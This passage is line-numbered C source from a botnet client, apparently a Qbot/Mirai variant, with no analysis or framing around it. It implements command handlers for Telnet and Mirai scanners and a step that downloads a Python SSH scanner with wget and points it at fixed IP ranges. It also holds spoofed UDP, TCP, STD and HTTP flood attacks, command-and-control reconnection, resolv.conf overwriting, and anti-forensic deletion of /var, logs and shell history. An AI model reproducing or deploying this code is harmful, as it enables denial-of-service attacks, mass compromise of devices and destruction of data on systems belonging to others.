1708. TelnetScanner(100, fds);
1709. _exit(0);
1710. }
1711. }
1712. if(!strcmp(argv[1], "OFF"))
1713. {
1714. if(scanPid == 0) return;
1715. kill(scanPid, 9);
1716. scanPid = 0;
1717. }
1718. if(!strcmp(argv[1], "FASTLOAD"))
1719. {
1720. int threads = atoi(argv[1]);
1721. int usec = atoi(argv[2]);
1722. if(!listFork())
1723. {
1724. sockprintf(mainCommSock, "[TELNET] Starting Fastload.");
1725. TelnetScanner(usec, threads);
1726. _exit(0);
1727. }
1728. return;
1729. }
1730. }
1731. if(!strcmp(argv[0], "MIRAI"))
1732. {
1733. if(!strcmp(argv[1], "ON"))
1734. {
1735.  
1736. uint32_t parent;
1737. parent = fork();
1738. int ii = 0;
1739. int forks = sysconf( _SC_NPROCESSORS_ONLN );
1740. int fds = 999999;
1741. if(forks == 1) fds = 500;
1742. if(forks >= 2) fds = 1000;
1743. if (parent > 0)
1744. {
1745. scanPid = parent;
1746. return;
1747. }
1748. else if(parent == -1) return;
1749.  
1750. for (ii = 0; ii < forks; ii++)
1751. {
1752. srand((time(NULL) ^ getpid()) + getppid());
1753. init_rand(time(NULL) ^ getpid());
1754. MiraiScanner(100, fds);
1755. _exit(0);
1756. }
1757. }
1758. if(!strcmp(argv[1], "OFF"))
1759. {
1760. if(scanPid == 0) return;
1761.  
1762. kill(scanPid, 9);
1763. scanPid = 0;
1764. }
1765. if(!strcmp(argv[1], "FASTLOAD"))
1766. {
1767. int threads = atoi(argv[1]);
1768. int usec = atoi(argv[2]);
1769. if(!listFork())
1770. {
1771. sockprintf(mainCommSock, "Starting scanner!!");
1772. MiraiScanner(usec, threads);
1773. _exit(0);
1774. }
1775. return;
1776. }
1777. }
1778.  
1779. if(!strcmp(argv[0], "PYTHON")) //Infect a Scanner server to the net, before executing this.
1780. {
1781. char SendPythonCommand[80];
1782.  
1783. if(!strcmp(argv[1], "INSTALL"))
1784. {
1785. system("sudo yum install python-paramiko -y;sudo apt-get install python-paramiko -y;");
1786. sockprintf(mainCommSock, "[PYTHON] Installing Dependencies.");
1787.  
1788. char MakePythonDirectory[80];
1789. sprintf(MakePythonDirectory, "sudo mkdir %s;", Python_Temp_Directory);
1790. system(MakePythonDirectory);
1791. sockprintf(mainCommSock, "[PYTHON] Making Directorys.");
1792.  
1793.  
1794. char WgetPythonPayload[80];
1795. sprintf(WgetPythonPayload, "cd %s;wget %s;", Python_Temp_Directory, Python_File_Location);
1796. system(WgetPythonPayload);
1797. sockprintf(mainCommSock, "[PYTHON] Downloading Scanner.");
1798.  
1799. ClearHistory();
1800.  
1801. sockprintf(mainCommSock, "[PYTHON] Done with installation.");
1802. }
1803. if(!strcmp(argv[1], "UPDATE"))
1804. {
1805. char ClearPythonDirectory[80];
1806. sprintf(ClearPythonDirectory, "cd %s;rm -rf scan.py", Python_Temp_Directory);
1807. system(ClearPythonDirectory);
1808. sockprintf(mainCommSock, "[PYTHON] Finishied Removing Existing Scanner.");
1809. ClearHistory();
1810.  
1811. sockprintf(mainCommSock, "[PYTHON] Done Updating Scanner.");
1812. }
1813. if(!strcmp(argv[1], "OFF"))
1814. {
1815. system("killall -9 python;pkill -9 python");
1816. ClearHistory();
1817. sockprintf(mainCommSock, "[PYTHON] Killing Python Scanning Process.");
1818. }
1819. if(!strcmp(argv[1], "1"))
1820. {
1821. char idefk[80];
1822. sprintf(idefk, "cd %s;python scan.py 376 B 119.93 lol", Python_Temp_Directory);
1823. system(idefk);
1824. ClearHistory();
1825. sockprintf(mainCommSock, "[PYTHON] Range: 119.93.x.x || Port 22");
1826. }
1827. if(!strcmp(argv[1], "2"))
1828. {
1829.  
1830. char idefk[80];
1831. sprintf(idefk, "cd %s;python scan.py 376 B 91.98 2", Python_Temp_Directory);
1832. system(idefk);
1833. ClearHistory();
1834. sockprintf(mainCommSock, "[PYTHON] Range: 91.98.x.x || Port: 22");
1835. }
1836. if(!strcmp(argv[1], "3"))
1837. {
1838. char idefk[80];
1839. sprintf(idefk, "cd %s;python scan.py 376 B 118.173 2", Python_Temp_Directory);
1840. system(idefk);
1841. ClearHistory();
1842. sockprintf(mainCommSock, "[PYTHON] Range: 118.173.x.x || Port: 22");
1843. }
1844. if(!strcmp(argv[1], "4"))
1845. {
1846. char idefk[80];
1847. sprintf(idefk, "cd %s;python scan.py 376 B 91.99 2", Python_Temp_Directory);
1848. system(idefk);
1849. ClearHistory();
1850. sockprintf(mainCommSock, "[PYTHON] Range: 91.99.x.x || Port: 22");
1851. }
1852. if(!strcmp(argv[1], "5"))
1853. {
1854. char idefk[80];
1855. sprintf(idefk, "cd %s;python scan.py 376 B 92.99 2", Python_Temp_Directory);
1856. system(idefk);
1857. ClearHistory();
1858. sockprintf(mainCommSock, "[PYTHON] Range: 92.99.x.x || Port: 22");
1859. }
1860. if(!strcmp(argv[1], "LOAD"))
1861. {
1862. char idefk[80];
1863. sprintf(idefk, "cd %s;python scan.py 376 B %s 2", Python_Temp_Directory, RandomPythonRange);
1864. system(idefk);
1865. ClearHistory();
1866. sockprintf(mainCommSock, "[PYTHON] Range: Random || Port: 22");
1867. }
1868. }
1869. if (!strcmp(argv[0], "HTTP"))
1870. {
1871. // !* HTTP METHOD TARGET PORT PATH TIME POWER
1872. // !* HTTP POST/GET/HEAD hackforums.net 80 / 10 100
1873. if (argc < 6 || atoi(argv[3]) < 1 || atoi(argv[5]) < 1) return;
1874. if (listFork()) return;
1875. SendHTTP(argv[1], argv[2], atoi(argv[3]), argv[4], atoi(argv[5]), atoi(argv[6]));
1876. exit(0);
1877. }
1878. if(!strcmp(argv[0], "UDP"))
1879. {
1880. // !* UDP TARGET PORT TIME PACKETSIZE POLLINTERVAL
1881. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || atoi(argv[4]) == -1 || atoi(argv[4]) > 1024 || (argc == 6 && atoi(argv[5]) < 1))
1882. {
1883. return;
1884. }
1885. unsigned char *ip = argv[1];
1886. int port = atoi(argv[2]);
1887. int time = atoi(argv[3]);
1888. int packetsize = atoi(argv[4]);
1889. int pollinterval = (argc == 6 ? atoi(argv[5]) : 10);
1890. int spoofed = 32;
1891. if(strstr(ip, ",") != NULL)
1892. {
1893. unsigned char *hi = strtok(ip, ",");
1894. while(hi != NULL)
1895. {
1896. if(!listFork())
1897. {
1898. SendUDP(hi, port, time, packetsize, pollinterval, spoofed);
1899. _exit(0);
1900. }
1901. hi = strtok(NULL, ",");
1902. }
1903. } else {
1904. if (listFork())
1905. {
1906. return;
1907. }
1908. SendUDP(ip, port, time, packetsize, pollinterval, spoofed);
1909. _exit(0);
1910. }
1911. }
1912. if(!strcmp(argv[0], "TCP"))
1913. {
1914. //!* TCP TARGET PORT TIME FLAGS PACKETSIZE POLLINTERVAL
1915. if(argc < 6 || atoi(argv[3]) == -1 || atoi(argv[2]) == -1 || (argc > 5 && atoi(argv[5]) < 0) || (argc == 7 && atoi(argv[6]) < 1))
1916. {
1917. return;
1918. }
1919. unsigned char *ip = argv[1];
1920. int port = atoi(argv[2]);
1921. int time = atoi(argv[3]);
1922. unsigned char *flags = argv[4];
1923. int pollinterval = argc == 7 ? atoi(argv[6]) : 10;
1924. int packetsize = argc > 5 ? atoi(argv[5]) : 0;
1925. int spoofed = 32;
1926. if(strstr(ip, ",") != NULL) {
1927. unsigned char *hi = strtok(ip, ",");
1928. while(hi != NULL) {
1929. if(!listFork()) {
1930. SendTCP(hi, port, time, flags, packetsize, pollinterval, spoofed);
1931. _exit(0);
1932. }
1933. hi = strtok(NULL, ",");
1934. }
1935. } else {
1936. if (listFork())
1937. {
1938. return;
1939. }
1940. SendTCP(ip, port, time, flags, packetsize, pollinterval, spoofed);
1941. _exit(0);
1942. }
1943. }
1944. if(!strcmp(argv[0], "STD"))
1945. {
1946. //!* STD TARGET PORT TIME
1947. if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
1948. {
1949. return;
1950. }
1951. unsigned char *ip = argv[1];
1952. int port = atoi(argv[2]);
1953. int time = atoi(argv[3]);
1954. if(strstr(ip, ",") != NULL)
1955. {
1956. unsigned char *hi = strtok(ip, ",");
1957. while(hi != NULL)
1958. {
1959. if(!listFork())
1960. {
1961. SendSTD(hi, port, time);
1962. _exit(0);
1963. }
1964. hi = strtok(NULL, ",");
1965. }
1966. } else {
1967. if (listFork())
1968. {
1969. return;
1970. }
1971. SendSTD(ip, port, time);
1972. _exit(0);
1973. }
1974. }
1975. if(!strcmp(argv[0], "KILLATTK"))
1976. {
1977. int killed = 0;
1978. unsigned long i;
1979. for (i = 0; i < numpids; i++)
1980. {
1981. if (pids[i] != 0 && pids[i] != getpid())
1982. {
1983. kill(pids[i], 9);
1984. killed++;
1985. }
1986. }
1987. if(killed > 0)
1988. {
1989. //
1990. } else {
1991. //
1992. }
1993. }
1994. if(!strcmp(argv[0], "LOLNOGTFO"))
1995. {
1996. exit(0);
1997. }
1998. if(!strcmp(argv[0], "UPDATE"))
1999. {
2000. RemoveTempDirs();
2001. sockprintf(mainCommSock, "[Updating] [%s:%s]", getBuild(), getEndianness());
2002. }
2003. }
2004. int initConnection() {
2005. unsigned char server[512];
2006. memset(server, 0, 512);
2007. if(mainCommSock) { close(mainCommSock); mainCommSock = 0; }
2008. if(currentServer + 1 == SERVER_LIST_SIZE) currentServer = 0;
2009. else currentServer++;
2010. strcpy(server, commServer[currentServer]);
2011. int port = 6942;
2012. if(strchr(server, ':') != NULL) {
2013. port = atoi(strchr(server, ':') + 1);
2014. *((unsigned char *)(strchr(server, ':'))) = 0x0;
2015. }
2016. mainCommSock = socket(AF_INET, SOCK_STREAM, 0);
2017. if(!connectTimeout(mainCommSock, server, port, 30)) return 1;
2018. return 0;
2019. }
2020. void UpdateNameSrvs() {
2021. uint16_t fhandler = open("/etc/resolv.conf", O_WRONLY | O_TRUNC);
2022. if (access("/etc/resolv.conf", F_OK) != -1) {
2023. const char* resd = "nameserver 8.8.8.8\nnameserver 8.8.4.4\n";
2024. size_t resl = strlen(resd);
2025. write(fhandler, resd, resl);
2026. } else { return; }
2027. close(fhandler);
2028. }
2029. void RemoveTempDirs() {
2030. system("rm -rf /tmp/* /var/* /var/run/* /var/tmp/*");
2031. system("rm -rf /var/log/wtmp");
2032. system("rm -rf ~/.bash_history");
2033. system("history -c;history -w");
2034. }
2035. int getEndianness(void)
2036. {
2037. union
2038. {
2039. uint32_t vlu;
2040. uint8_t data[sizeof(uint32_t)];
2041. } nmb;
2042. nmb.data[0] = 0x00;
2043. nmb.data[1] = 0x01;
2044. nmb.data[2] = 0x02;
2045. nmb.data[3] = 0x03;
2046. switch (nmb.vlu)
2047. {
2048. case UINT32_C(0x00010203):
2049. return "BIG";
2050. case UINT32_C(0x03020100):
2051. return "LITTLE";
2052. case UINT32_C(0x02030001):
2053. return "BIG";
2054. case UINT32_C(0x01000302):
2055. return "LITTLE";
2056. default:
2057. return "UNKNOWN";
2058. }
2059. }
2060. int main(int argc, unsigned char *argv[]) {
2061. const char *lolsuckmekid = "";
2062. if(SERVER_LIST_SIZE <= 0) return 0;
2063. strncpy(argv[0],"",strlen(argv[0]));
2064. argv[0] = "";
2065. prctl(PR_SET_NAME, (unsigned long) lolsuckmekid, 0, 0, 0);
2066. srand(time(NULL) ^ getpid());
2067. init_rand(time(NULL) ^ getpid());
2068. pid_t pid1;
2069. pid_t pid2;
2070. int status;
2071. if (pid1 = fork()) {
2072. waitpid(pid1, &status, 0);
2073. exit(0);
2074. } else if (!pid1) {
2075. if (pid2 = fork()) {
2076. exit(0);
2077. } else if (!pid2) {
2078. } else {
2079. }
2080. } else {
2081. }
2082. chdir("/");
2083. setuid(0);
2084. seteuid(0);
2085. signal(SIGPIPE, SIG_IGN);
2086. while(1) {
2087. if(fork() == 0) {
2088. if(initConnection()) { sleep(5); continue; }
2089. sockprintf(mainCommSock, "[ CONNECTION ] IP: %s || Arch: %s || Type: %s]", inet_ntoa(ourIP), getBuild(), getEndianness());
2090. UpdateNameSrvs();
2091. RemoveTempDirs();
2092. char commBuf[4096];
2093. int got = 0;
2094. int i = 0;
2095. while((got = recvLine(mainCommSock, commBuf, 4096)) != -1) {
2096. for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
2097. unsigned int *newpids, on;
2098. for (on = i + 1; on < numpids; on++) pids[on-1] = pids[on];
2099. pids[on - 1] = 0;
2100. numpids--;
2101. newpids = (unsigned int*)malloc((numpids + 1) * sizeof(unsigned int));
2102. for (on = 0; on < numpids; on++) newpids[on] = pids[on];
2103. free(pids);
2104. pids = newpids;
2105. }
2106. commBuf[got] = 0x00;
2107. trim(commBuf);
2108. if(strstr(commBuf, "PING") == commBuf) { // PING
2109. continue;
2110. }
2111. if(strstr(commBuf, "DUP") == commBuf) exit(0); // DUP
2112. unsigned char *message = commBuf;
2113. if(*message == '!') {
2114. unsigned char *nickMask = message + 1;
2115. while(*nickMask != ' ' && *nickMask != 0x00) nickMask++;
2116. if(*nickMask == 0x00) continue;
2117. *(nickMask) = 0x00;
2118. nickMask = message + 1;
2119. message = message + strlen(nickMask) + 2;
2120. while(message[strlen(message) - 1] == '\n' || message[strlen(message) - 1] == '\r') message[strlen(message) - 1] = 0x00;
2121. unsigned char *command = message;
2122. while(*message != ' ' && *message != 0x00) message++;
2123. *message = 0x00;
2124. message++;
2125. unsigned char *tmpcommand = command;
2126. while(*tmpcommand) { *tmpcommand = toupper(*tmpcommand); tmpcommand++; }
2127. unsigned char *params[10];
2128. int paramsCount = 1;
2129. unsigned char *pch = strtok(message, " ");
2130. params[0] = command;
2131. while(pch) {
2132. if(*pch != '\n') {
2133. params[paramsCount] = (unsigned char *)malloc(strlen(pch) + 1);
2134. memset(params[paramsCount], 0, strlen(pch) + 1);
2135. strcpy(params[paramsCount], pch);
2136. paramsCount++;
2137. }
2138. pch = strtok(NULL, " ");
2139. }
2140. processCmd(paramsCount, params);
2141. if(paramsCount > 1) {
2142. int q = 1;
2143. for(q = 1; q < paramsCount; q++) {
2144. free(params[q]);
2145. }
2146. }
2147. }
2148. }
2149. }
2150. return 0;
2151. }
2152. }